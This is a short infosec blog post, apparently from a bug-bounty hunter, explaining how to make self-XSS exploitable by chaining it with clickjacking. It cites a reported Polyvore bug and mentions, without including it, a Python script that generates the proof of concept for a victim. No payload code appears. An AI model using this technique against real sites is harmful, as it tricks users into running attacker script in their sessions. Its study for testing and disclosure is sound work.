Vishwaraj Bhattrai

just another infosec enthusiast

Exploiting unexploitable/self Xss

Their are multiple end points where we can get Xss in web apps but most of time they are self 😛  which require user interaction to trigger so to make it exploitable or Poc we are left with 2 options typically :p

  1. Using Clickjacking
  2. Using CSRF

depending upon which above 2 cases are present we can create poc

So here i will discuss real example in one of the yahoo acquisition “polyvore” which i reported

Their were multiple fields vulnerable to  xss they were self but their page was vulnerable to clickjack so we can exploit by putting a relative xss vector to bypass filter into fields with the help of user by tricking him to play a game of drag and drop .

which is atleast better then standalone poc atleast will convey the team :v
I will create separate post how to do it via csrf (no such fantasy involved in that too  ) but clickjack involve little configs  so just a bookmark post if you got such situations.

So i have just written  custom  .py  script which will create a clickjack to xss poc  .On running the script it will ask you the 2 things

  1. Xss vector to bypass the filter
  2.  Custom clickjack code which you can create from here here

Q.) Why custom clickjack code ? 

Because their are specific textfields ,textarea which are vulnerable and needed to include as a part of game ! you will better undestand in the video below .

Now you can give this file to victim !

Poc in action ?

Script ?

Greetz to #kotowicz for great work in Clickjacking domain .

That’s all guys 🙂

$ logout







Published by

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: